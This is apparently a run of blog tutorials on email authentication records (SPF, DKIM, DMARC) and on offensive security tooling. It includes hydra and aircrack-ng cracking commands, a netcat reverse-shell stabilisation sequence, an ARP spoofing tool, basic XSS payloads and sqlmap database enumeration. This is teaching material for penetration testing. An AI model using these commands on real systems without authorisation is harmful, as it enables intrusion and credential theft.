DMARC Record - Explained

SPF, DMARC and, DKIM are the email security protocols used by companies or businesses to prevent various phishing attacks. Phishing and email spam are the biggest opportunities for hackers to enter the network. If a user clicks on a malicious email attachment, it can compromise an entire enterprise with ransomware, crypto-jacking scripts, data leakages, or privilege escalation exploits.

Source - From the Internet

DMARC is an acronym for “Domain-based Message Authentication, Reporting, and Conformance”. It’s an email authentication, policy, and reporting protocol that’s actually built around both SPF and DKIM. It has three basic purposes:

• Verifies that a sender’s email messages are protected by both SPF and DKIM,
• Tells the receiving mail server what to do if neither of those authentication methods pass, and
• Provides a way for the receiving server to report back to the sender about messages that pass and/or fail the DMARC evaluation (it is kinda a big fellow in the ground).

Since DMARC uses both SPF and DKIM, you may wonder why it’s even necessary. Well, it’s simple: DMARC basically builds on SPF and DKIM to ensure that, when an email is received, the information contained in both records matches the “friendly from” domain (e.g., me@my-domain.com) that the user actually sees and the "from address" that is in the message’s header. This is what the folks at Dmarcian, a company founded by one of the primary authors of the DMARC specification, call “Identifier Alignment.”

CHECKING FOR DMARC RECORDS

• Go to DMARC Check Tool.

DMARC Check Tool by MX Toolbox

• Enter your domain name for which you want to check DMARC record. For example, GitHub.com
• If you get the results in the following way congrats you already have your DMARC configured and your webmail is safe from phishing.

DMARC Record Example

If the website does not have the Records, check the below section.

CREATE DMARC RECORDS

Once you have both SPF and DKIM in place, then it’s time to create your DMARC record. The easiest way to do this is to use a DMARC wizard. There are many sites that offer such a tool: MXToolbox, DMARC Analyzer (requires to sign up), Dmarcian, and more. The Dmarc.org site also provides a list of utilities for generating DMARC records, DMARC lookup and parsing, message validation, and more. Most of these sites also have tools to validate your DMARC record once DNS propagation has taken place.

Regardless of the tool you use, a DMARC record utilizes a number of “tags”. There are really only 2 tags that are actually required: “v” and “p”. Other tags are purely optional, and DMARC experts kind of disagree on which optional tags are recommended and which are not. Let’s look at the required tags first:

• v - This is the version tag, just like with SPF. It MUST be “DMARC1” and be the first tag listed in the DMARC record.
• p - This is the policy tag. It tells the receiving server which policy to apply to a message that fails DMARC: “none” or do nothing to a message, “quarantine” a message, or “reject” the message.

Optional tags include the following:

• pct - This is the percent of suspicious messages that the DMARC policy applies to. Of course, the default is 100, but it can be set to whatever you want it to be.
• rua=mailto:address@company.com - This tag tells receiving servers where to send aggregate reports. These reports provide visibility into the health of the sending server by helping to identify potential authentication issues or malicious activity. These reports are sent daily, so, ideally, if you want reports sent, they’re sent to a mail address set up specifically FOR these reports and not a domain admin account.
• fo - This tag lets receiving servers know that samples of messages that fail either SPF and/or DKIM should be returned to the sender. There are four value options for this tag:
• 0: Generate a DMARC failure report if both SPF and DKIM fail to produce a “Pass” result. This is the default option.
• 1: Generate a DMARC failure report if both SPF and DKIM produce something other than a “Pass” result. This is the recommended option.
• d: Generate a DKIM failure report if the message had a DKIM signature that failed the evaluation, regardless of why.
• s: Generate an SPF failure report if the message failed SPF evaluation, regardless of why.

So what does a DMARC record look like? Let's look at the record for SmarterTools:

v=DMARC1; p=none; rua=mailto:fbl@smartertools.com; fo=1

As you can see, we have both required tags: v and p, set, but a few optional tags as well. For the policy tag (p) it is set to “none”. So, we’re basically collecting feedback on messages but we’re not necessarily “interrupting the flow of messages”, even if they fail SPF and/or DKIM. From a DMARC rollout perspective, this is a prudent course of action. That’s because while DMARC is a serious way to catch potential phishing emails, it’s not a widely adopted policy. Therefore, many domains don’t have SPF or DKIM set up, let alone both. So for the time being, simply watching messages and seeing their disposition, without quarantining or outright rejecting them, is the best way to go for DMARC implementation.

You might also interested in,

• SPF Records
• DKIM Records
• Are these records really necessary?

We hope this helps. If any suggestions or doubts you can add a comment and we will reply as soon as possible.

Are SPF, DKIM, and DMARC records Necessary

SPF, DMARC and, DKIM are the email security protocols used by companies or businesses to prevent various phishing attacks. Phishing and email spam are the biggest opportunities for hackers to enter the network. If a user clicks on a malicious email attachment, it can compromise an entire enterprise with ransomware, crypto-jacking scripts, data leakages, or privilege escalation exploits.

Source - From the Internet

Having those three records in place is considered the best practice. As the saying goes, “An ounce of prevention is worth a pound of cure.” For email, this has never been more true. Having all three records in place shows that your email domains are truly who they say they are. It also shows that you as an administrator, and your domain administrators as well, are all serious about ensuring you’re following best practices and doing your part to prevent spam, phishing, and other email security issues.

You might also interested in,

• SPF Records
• DKIM Records
• DMARC Records

We hope this helps. If any suggestions or doubts you can add a comment and we will reply as soon as possible.

DKIM Record - Explained

SPF, DMARC and, DKIM are the email security protocols used by companies or businesses to prevent various phishing attacks. Phishing and email spam are the biggest opportunities for hackers to enter the network. If a user clicks on a malicious email attachment, it can compromise an entire enterprise with ransomware, crypto-jacking scripts, data leakages, or privilege escalation exploits.

Source - From the Internet

DKIM is an acronym for DomainKeys Identified Mail. When sending an email from a server that has DKIM configured, the server will hash the body and the header of the email separately. It will then,  create a signature with a private key which will send along with the email.

When the receiver receives the email, it will do a DNS request to the domain that the email claim it is from. By doing so, the receiver will get the public key which is the DKIM-record. It will then with the key can verify the signature is correct or not, and by doing so it will confirm that the sender is genuine and the mail has not been manipulated on its way there.

CHECKING FOR DKIM RECORDS

• Go to DKIM Records Lookup.

DKIM Records Lookup by MX Toolbox

• Enter the domain name and selector (A DKIM selector is text, that is added with the domain to create a unique DNS record used during DKIM. This allows multiple keys to exist under one domain which allows for different signatures to be created by different systems, date ranges, or third-party services). For example, GitHub.com.

• If you get the results in the following way that means the website has DKIM records and it's safe.

If the website does not have the Records, check the below section.

Create DKIM Records

Ideally, your mail server will provide a tool that allows you to create the information right on the server. (For SmarterMail users, information on “Setting Up Email Signing” is available in the Help documentation). Regardless of how you create your record, the following information is part of it:

• s - This is the selector and it indicates the record “name” used with the domain to locate the public key in DNS. The sender creates this (again, ideally automatically).
• d - This indicates the domain, used by the sender. Used with the selector record and helps locate the public key.
• p - This is the actual public key that gets published to DNS as part of the record. Therefore, it will look like a random set of upper and lower case letters, numbers, and some punctuation marks.

These are the three key parts of a DKIM record. Other tags are available, but these three are the most commonly used. Therefore, a typical DKIM record will look like this:

2B8U4DAB93D58YR._domainKey.yourdomain.com;

p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC1TaNgLlSyQMNWVLNLvyY/neDgaL2oqQE8T5illKqCgDtFHc8eHVAU+nlcaGmrKmDMw9dbgiGk1ocgZ56NR4ycfUHwQhvQPMUZw0cveel/8EAGoi/UyPmqfcPibytH81NFtTMAxUeM4Op8A6iHkvAMj5qLf4YRNsTkKAV

In the above, you’ll find the following:

• Selector (s): 2B8U4DAB93D58YR
• Domain (d): yourdomain.com
• Public Key (p): MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC1TaNgLlSyQMNWVLNLvyY/neDgaL2oqQE8T5illKqCgDtFHc8eHVAU+nlcaGmrKmDMw9dbgiGk1ocgZ56NR4ycfUHwQhvQPMUZw0cveel/8EAGoi/UyPmqfcPibytH81NFtTMAxUeM4Op8A6iHkvAMj5qLf4YRNsTkKAV

The other information in the record will be added automatically, but it is generally the same regardless of how the record is created. (I.e., _domainKey).

You might also interested in,

• SPF Records
• DMARC Records
• Are these records really necessary?

We hope this helps. If any suggestions or doubts you can add a comment and we will reply as soon as possible.

SPF Record - Explained

SPF, DMARC and, DKIM are the email security protocols used by companies or businesses to prevent various phishing attacks. Phishing and email spam are the biggest opportunities for hackers to enter the network. If a user clicks on a malicious email attachment, it can compromise an entire enterprise with ransomware, crypto-jacking scripts, data leakages, or privilege escalation exploits.

Source - From the Internet

SPF is an acronym for “Sender Policy Framework”. As with all three checks, SPF is a DNS TXT record that specifies which IP addresses and/or servers are allowed to send email “from” that particular domain. It’s essentially like the return address that’s placed on a letter or postcard that lets the recipient know who sent the communication. The idea is that if they know who sent them the letter, the recipient is more likely to open it. 

Sender Policy Framework (SPF) hardens your DNS servers and restricts who can send emails from your domain. SPF can prevent domain spoofing. It enables your mail server to determine which message came from the verified domain. SPF has three major elements: a policy framework as its name implies, an authentication method, and specialized headers in the actual email that convey this information. SPF was first proposed with IETF standard 4408 back in 2006 and has been updated most recently to standard 7208 in 2014.

CHECKING FOR SPF RECORDS

• Go to SPF Record Check - Lookup SPF Records.

SPF Checker website by MX Toolbox

• Enter the domain name and search for the records. For Example, GitHub.com.
• If you get the results in the following way that means the website has SPF records and it's safe.

SPF Records of GitHub

If the website does not have the Records, check the below section.

Create SPF Records

An SPF record is a very simple string that can be easily created and added to DNS records by a domain administrator as a TXT entry. Few things to keep in mind:

• The SPF version being used.
• The IPs that are authorized to send an email for the domain.
• Any third-party domains that are authorized to send an email.
• An ending "all" tag indicates that the policy should be applied when a "receiving server" detects an IP/domain that’s not part of the SPF record.

v=spf1 ip4:22.23.24.25 include:another-domain-that-can-send-email-for-us.com -all

• v=spf1 - This simply states that version 1 of SPF is being implemented. There is no other version at this point, so this should always be “v=spf1”, at least until another version is released. (If you’re curious, there was another version at one time -- SenderID -- but it’s been discontinued.)
• ip4:22.23.24.25 - This is the IP address of the mail server and/or domain that’s authorized to send an email. Multiple IPs can be used. So if your mail provider rotates IPs, all IP addresses can be listed either individually (ip4:22.23.24.25 ip4:12.13.14.15) or through a CIDR range (ip4:22.23.24.0/20). Note that both IPv4 and IPv6 addresses should be listed if any used by the mail server.
• include:another-domain-that-can-send-email-for-us.com - This is a secondary domain that is authorized to send an email on behalf of the primary mail domain. If multiple domains are authorized, they should all be listed as separate “includes.” However, a maximum of 10 includes is allowed for any sending domain.
• all - The “all” tag basically tells the receiving server how it should handle all messages sent from a domain if it sees a domain in the header that’s not listed in the SPF record. There are a few options, and these options are dictated by the character that precedes the “all” tag. These are:
• -all (dash all) - This is a hard fail. This means that servers that aren’t listed in the SPF record aren’t recognized or authorized to send an email for the domain, so the email should be rejected by the receiving server.
• ~all (tilde all) - This is a soft fail. Basically, that means that the server isn’t listed in the SPF record, but it should not be flat-out rejected by the receiving server. Instead, the message will be marked as possible spam.
• +all (plus all) - THIS IS NOT RECOMMENDED. This tag essentially means any domain listed is authorized to send an email, even if it’s not listed in the SPF record.

You might also be interested in,

• DKIM Records
• DMARC Records
• Are these records really necessary?

We hope this helps. If any suggestions or doubts you can add a comment and we will reply as soon as possible.

Get Your First Private Invite In HackerOne

In order to get private invites Bug Hunters must have a good reputation and valid bugs but for the newcomers, it would be a bit hard to hunt on the public programs as they have been there for a long time and many researchers have already participated and swept the bugs in it. 

A private invite could really encourage a newcomer to hunt and increase their chances of getting the first valid bug. HackerOne hosts a CTF, where any participants who score 26 points would get a private invite. We are going to show you how to solve the CTF in an easy way and get your first private invite.

Let's get started

• A little something to get you started - 1 Point * 1 Question = 1 Point
• Micro-CMS v1 - 2 Point* 4 Question = 8 Points
• Micro-CMS v2 - 3 Point * 2 Question = 6 Points
• Encrypted Pastebin - 9 Point * 1 Question = 9 Points
• Postbook - 4 Point * 1 Question = 4 Points

This will give you 28 points and a private invite to start with :)

We hope this helps. If any suggestions or doubts you can add a comment and we will reply as soon as possible.

Arjun - HTTP Parameter Discovery Suite

Arjun is a web application security tool that can help to find query parameters for URL endpoints. Query parameters are used by an attacker to hunt various vulnerabilities. For Example, XSS (Cross-Site Scripting), SQL Injection, LFI, RFI, and etc. With the help of this tool, you will understand what type of parameter is vulnerable. Then you can try payloads on those parameters.

Consider the following example of how parameters (or queries) are used in web applications to accept user input: Here the parameter is id.

http://www.hackhunt.in/userinfo?id=92577488

Explanation: A parameter termed admin, whenever set to true, will cause the endpoint to give extra information about a user whenever the URL is accessed. So we need to identify these kinds of valid HTTP arguments and this is exactly what Arjun performs.

Installation

There are two ways to install the Arjun tool in the Kali Linux system:

• One: This tool comes as pip repository.

Already installed on the machine

• Two: You can clone it from Github. Command: git clone https://github.com/s0md3v/Arjun.git

via GitHub Repository

• To install, command: sudo python3 install setup.py

Manual Installation

• After installing, you can check the tool capability with --help or -h command: arjun -h.

Help Command / All Options

• For Example, we are taking a vulnerable website called testphp.vulnweb.com. Here, search anything in the search box and it will give parameters in the URL. To run the Arjun tool, it needs parameters from which it will find that it is vulnerable or not, so copy the URL.

Get URL with Parameter

• -u: With this argument, you can specify the URL. In this scenario, $ arjun -u http://testphp.vulnweb.com/search.php?test=query.

Search for Parameters

• It reflects that the goButton and searchFor input will reflect. So from attacker point of view, these parameters are not sanitized. We can try any payload for example in this case with a basic XSS payload: <script>alert(“HackHunt”)</script>.
• We can try the above payload in the search box.

Basic XSS Payload

XSS Payload executed means this parameter is vulnerable. Similarly you can find parameters with the help of this tool and try to hunt with the payload.

Now, 

• -t: This argument is used to pass the threads.
• -c: This argument is used to put the chunks which basically by default taken by Arjun tool but we can also minimize and maximize the chunk size with this argument.
• --stable: This argument is used to prefer stability as compare to faster speed, because sometime faster speed will doudge some sensitive information.

If all of these arguments, used collectively then it will give you better output but it will take time to get back to it.

Result with the Options

• After adding some argument in the search parameter URL. We tried on signup page on the same website (testphp.vulnweb.com) with -t (thread) = 100, and it found more parameters which maybe vulnerable like uname & pass along with searchFOR & goButton.

With 100 Thread

• --passive: This argument will help, when there is no parameter found. Still it give outputs, means it collects possible vulnerable parameters points by passive sources like wayback, gau, otx etc.

With Passive

Note: Some arguments by default take their own suitability (for example -w which is used for wordlist but by default arjun have their own wordlist). So, it’s better to not change those argument with some instance because arjun already known how to run with their default values. It is also shown in the help command that which argument is taken as default and where you have to type something.

If you want to know the whole argument working you can refer to this document: https://github.com/s0md3v/Arjun/wiki/Usage

We hope this helps. If any suggestions or doubts you can add a comment and we will reply as soon as possible.

Brute Force Attack v/s Dictionary Attack

Password Cracking is basically getting unauthorized access to a victim account using different methods from which two are discussed below. There are many other ways of getting credentials the most used one is phishing attack. Below we discuss two types of cracking attacks.

Brute-Force Attack 

It’s a type of attack in which the attacker tries to do a trial-and-error attack on victim machine with either a predefined wordlist or create his own wordlist using crunch in which words might not make sense. 

This kind of attack is most often used in cracking of WEP/WPA/WPA2 cracking. The probability of getting password via Brute-Force attack is low. Also, if the attacker uses the same trick against a website, it might not work as the website may have a maximum attempt rule. 

The tools that can be used for brute forcing are:

• aircrack-ng: used for WiFi password. Command - aircrack-ng -w (wordlist File) -b (MAC of the network) xyz.cap(cap file or the handshake file)
• hyrda: used in web apps, SSH, FTP, etc. Command - hydra -l(for single username)/-L(wordlist of usernames) -p/-P(single/list of password) <target-url> <module-name(post/get)> <parameters>

Dictionary Attack

In a dictionary attack the wordlist is created using some basic information of the target like name, DOB, etc. In case of website CeWL is the best tool as it searches the website for the keywords of the length that is specified and collect those names in a file and store is as a wordlist. 

The dictionary attack is similar to brute-force as in both wordlist is used but the words used in dictionary attack are meaningful words just like in dictionaries.  

One that can be used is rockyou.txt which is available in “/usr/share/wordlist” 

CeWL command - cewl -m 5(min_length of word) -w (name of file in which words should be stored) “URL”

These are the most commonly used tool and there are many more like Medusa, Ncrack, Wpscan, etc.

We hope this helps. If any suggestions or doubts you can add a comment and we will reply as soon as possible.

Phishing v/s Vishing v/s SMShing

PHISHING

According to Wikipedia, Phishing is the fraudulent attempt to obtain sensitive information or data, such as usernames, passwords, and credit card details, or other sensitive details, by impersonating oneself as a trustworthy entity in digital communication.

In a nutshell, phishing is a type of attack that typically attempts to trick the victim into clicking on a link or executing malware. It is typically carried out by sending fake emails or instant message about a fake website looks like legitimate to enter credentials. Also, it is a form of social engineering.

SMiShing

• SMS Phishing uses text messages to deliver the bait to divulge their personal information. 
• Smishing attacks typically invite the user to click a link, call a phone number, or contact an email address provided by the attacker via SMS message. 
• The victim is then asked to provide sensitive information. Moreover, URLs may not be displayed properly on mobile browsers. Results in making it difficult to identify a genuine webpage.
• As the use of mobile phones increased in past few years, a malicious link sent via SMS can yield the same result as it would have via email.

VISHING

• Vishing is phishing over a voice call.
• Not all attacks require a fake login website.
• Text Messages that claimed to be from a bank tell users to dial a number, if they want to resolve the issue with their bank account or need a discount on their credit card number.
• When the phone number is dialed, it asks users to enter their account number and PIN.
• It may sometimes give a fake caller-ID data to make it look like a legitimate one (in this case using Truecaller or any other application will work as bait).

If you encounter and number or email with these malicious activities, please report that email id or phone number using our contact us form.

We hope this helps. If any suggestions or doubts you can add a comment and we will reply as soon as possible.

Stabilize Shell in netcat

netcat is a computer networking utility for reading from and writing to network connections using TCP or UDP. We can use netcat to get the reverse shell from the remote machine. 

A reverse shell is a shell session established on a connection that is initiated from a remote machine, not from the localhost.

A bind shell is a type of shell in which the target machine opens up a communication port or a listener on the victim machine and waits for an incoming connection.

Netcat is a very good tool to receive connections and enumerate further. After connecting to a device, netcat does not provide a lot of shell commands like shell history or shortcuts. To use those commands and stabilize the connection, follow the below steps;

•  Connecting to the remote shell.

nc <IP> <PORTt>

• Spawn a remote pseduoterminal.

python -c "import pty; pty.spawn('/bin/bash')"

• Background your raw shell.

C-z (Ctrl + Z)

• Set local terminal to raw mode.

stty raw -echo

• Foreground your remote shell. 

fg

This will give you a full terminal that will not exit on C-c. 

The added steps to get a reverse shell is repetitive after a while. There is also a danger of losing your remote shell by accidentally pressing “C-c” prior to gaining raw access. 

Pwncat rectifies the problem by running a script on the target machine, which contains all the commands soon after it starts a connection.

CLICK HERE TO KNOW MORE ABOUT PWNCAT

We hope this helps. If any suggestions or doubts you can add a comment and we will reply as soon as possible.

Detect ARP Attacks via XArp Tool

XArp is a security application that uses advanced techniques to detect ARP based attacks. Using active and passive modules XArp detects hackers inside your network. ARP attacks allow an attacker to silently eavesdrop or manipulate all your data that is sent over the network.

**NOTE - This is only available for Windows and Ubuntu users only.

• Download the XArp tool (Official Website).

• Alternative link (from Mediafire)

• Install the Tool.
• Windows: Simple Installation
• Ubuntu: In the terminal, redirect to the file and type, dpkg -i <File_Name>.
• If the system is not under attack you will see something like this.

• If the system is under attack you will see something like this.

**NOTE - Check our personalized-made tool or other ways. CLICK HERE!

CLICK HERE TO SEE MORE OF ARP RELATED ARTICLES

We hope this helps. If any suggestions or doubts you can add a comment and we will reply as soon as possible.

Network Scanner v1.0

Network Scanner is free open-source tool that can be use to scan the whole Internal Network.

The Source code is written in Python and can be further use. This tool is licensed under GNU, General Public License v3.0. Make sure you read the license before using its source code.

Network Scanner supports Linux/Debian Platform only.

How to use:

• Convert the setup.sh into the executable.
• chmod 755 setup.sh
• Run setup.sh
• ./setup.sh
  
• Run the python script with root privileges.
  
• sudo python3 network_scanner.py
  

Available Arguments:

• -h or --help: Displays all the available options.
• -i or --interface: This option needs to be used to define for which interface you want to scan the network. Example: sudo python3 network_scanner.py -i <interface_name>
• -r or --range: This option needs to be used to define the network IP and the subnet mask. Example: 192.168.0.1/24 or 10.0.0.0/8 or 172.16.0.0/12. Command: sudo python3 network_scanner.py -i <interface_name> -r <range/mask>.
  
  

**NOTE -

• You need to be connected to the network for scanning, as the program is based on ARP Request Protocol.
• Check the video at the bottom, for a full tutorial on How to Use.

Color Significance:

• Green: Successful.
• Yellow: In process.
• System Color: Result.
  
• Red: Unsuccessful or Errors.

To download the tool:

• In terminal type, git clone https://github.com/hackhunt/network-scanner/, or click here
  

We hope this helps. If any suggestions or doubts you can add a comment and we will reply as soon as possible.

ARP Spoofer v1.0

ARP Spoofer is a free open source tool that can be used to do Man in the Middle Attack.

The Source code is written in Python and can be further use. This tool is licensed under GNU, General Public License v3.0. Make sure you read the license before using its source code.

ARP Spoofer supports Linux/Debian Platform only.

Easier to use than arpspoof (in-built Kali Linux tool).

How to use:

• Convert the setup.sh into the executable.
• chmod 755 setup.sh
• Run setup.sh
• ./setup.sh
  
• Run the python script with root privileges.
  
• sudo python3 arp_spoofer.py

Available Arguments:

•     -h or --help: Displays all the available options.
•     -i or --interface: Required. Define the interface you want to start spoofing.
•     -r or --router: Required. Define the router’s IP address.
•     -t or --target: Required. Define the target’s IP address.

 **Note:

• You need to be connected to the same network as this program is based on ARP Request Protocol.
• Check the video at the bottom, for a full tutorial on How to Use.

Color Significance:

• Green: Successful.
• Yellow: In process.
• System Color: Result.
  
• Red: Unsuccessful or Errors.

To download the tool:

• In terminal type, git clone https://github.com/hackhunt/arp-spoofer/, or click here
  

We hope this helps. If any suggestions or doubts you can add a comment and we will reply as soon as possible.

Concept of XSS

Cross-site scripting is also known as XSS where X stands for CROSS and SS stands for SITE SCRIPTING (just our assumption). It is an injection-based attack where the attacker submits a malicious code that is accepted by the server and has the ability to harm the company’s infrastructure or leak the PII (Personal identification information) of their users.

XSS is the most common type of vulnerability. It is always placed in OWASP's top 10. Using the popular and modern frameworks while developing the website might reduce the risk of cross-site scripting but it won't eradicate the risk completely. So, XSS will always be there no matter what.

XSS can be found in the places where the user input is required; in the Web application like username, address, and profile field or even in an image file name uploaded to the server.

TYPES OF XSS:

There are mainly three types of XSS:

• Reflected XSS
• Stored XSS
• DOM XSS

Reflected XSS

Reflected XSS arises when the malicious code supplies by the attacker are immediately shown in the response of the site. An attacker could only exploit the Reflected XSS by tricking the user into opening the vulnerable page in a website and then the attacker can gain the session cookies, impersonate the user and gain full access over their account, which can also virtually deface the website.

Reflected XSS arises when the user input is sanitized properly and then executed by the server.

For Example:

There is an online shopping portal that has a search functionality and its URL for the search term KNOWLEDGE will be

https://vulnerable-website.com/search?term=knowledge

and when the attacker searches for a JavaScript code instead of the item he wishes to the URL will be like

https://vulnerable-website.com/search?term=<script>alert(1)</script>

Reflected XSS Example

Here, JavaScript treats the malicious code injected by the attacker as a legit one coming from the source and executes the code and it will result in a pop-up alert box.

An attacker could only exploit this vulnerability by tricking the user into opening the link. It can be done by placing the unsafe links in an attacker-controlled websites or sending them through messages or emails.

Ways to find reflected XSS:

• Find every parameter on the website.
• Try injecting the simple payloads like <script>alert(1)</script>.
• Monitor the website carefully if the website is accepting the code and you see a pop-up. Congrats you have found an XSS and if it doesn’t know what is stopping it from being fired, ask yourself whether is it the firewall or the sanitization or use BurpSuite to check and play around.
• If the website doesn’t allow some characters like “, >, <, /, or tags like a script. Try their alternatives or try encoding them, who knows the developer might allow encoding to process.
• Try different payloads and know which characters are allowed and which are blocked. This will give you a lot of insight into the working of web applications.

STORED XSS

As you might have guessed by name the stored XSS, is a type of XSS where the malicious code supplied by the attacker is stored in the server and would execute whenever the user visits the page. It is also referred to as a persistent XSS.

Generally, this type of XSS can be found in the comments section or post section of a website where the user input is stored in the server. Sometimes, XSS can even be stored in the username of a user or even as their profile display, and whoever visits the profile of the user the payload will fire.

Blind Cross-site Scripting is a form of persistent XSS. It generally occurs when the attacker’s payload is saved on the server and reflected back to the victim from the backend application. For example in feedback forms, an attacker can submit the malicious payload using the form, and once the backend user/admin of the application will open the attacker’s submitted form via the backend application, the attacker’s payload will get executed. Blind Cross-site Scripting is hard to confirm in the real-world scenario but one of the best tools for this is XSS Hunter.

DOM-Based XSS

This type of XSS occurs when the javascript supplied by the user is taken into the sources and given back by the sinks.

This is one of the hardest types of XSS to find.

If the web application is using any of the below-mentioned functions. In its JavaScript code and within that function if there is a call to a variable then we could inject our own javascript code into it.

document.url
document.referrer()
location()
location.href()
location.search()
location.hash()
location.pathname()
sinks:
element.innerHTML()
element.outerHTML()
setinterval()
eval()
setTimeout(
document.write( document.writeln()

If the JavaScript code we supplied passes through any of the sources which get executed in the sinks then we will have our XSS pop-up.

Let's see an example

DOM Based Example

Here we could see that there is a source location.href(“”) which has a variable of # if we could inject our payload into the #. It would get executed in the third line divElement.innerHTML = source; //sink and we would get our XSS popped up.

POLYGLOT: The King Payload

An XSS Polyglot is a mixture of different injections and payloads. These are generally made by bug hunters having a lot of experience. 

These Polyglots are used to break the HTML and all the blacklists and whitelists which are placed to prevent the poping of alert boxes.

Some of the examples for XSS polyglots are:

CHECK HUNTER'S VIEWS ON XSS EXPLOIT

We hope this helps. If any suggestions or doubts you can add a comment and we will reply as soon as possible.

Intercept Request using BurpSuite to use in SQLMap

SQLMap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. BurpSuite is an automated web vulnerability scanner.

USING REQUEST TO FIND SQLI

• Intercept the POST request using BurpSuite.

• If the request is not POST, like if it is a GET request

• Right-Click > Change request method. The method will be changed to POST as shown above.

• After you intercepted the POST request. Save the request to a file. To do that, right-click > Copy to file. Choose a name and location to store the file. 

• Fire-up the terminal, parse the file into SQLMap using -r switch.
• Syntax: sqlmap -r <file_location> 

sqlmap -r post_req_file -p “name” --dbs --threads 5

• The switches used in the above example are:
• -r: Request File
• -p: Parameters
• --dbs: Enumerate Database
• --thread: Number of threads to run.

You might also be interested in, 

• Other OWASP Top 10 Vulnerabilities
• Concept of SQL Injection
• Other types of injection vulnerabilities
• Know more about SQLMap
• Know more about POST, GET, and other methods.

We hope this helps. If any suggestions or doubts you can add a comment and we will reply as soon as possible.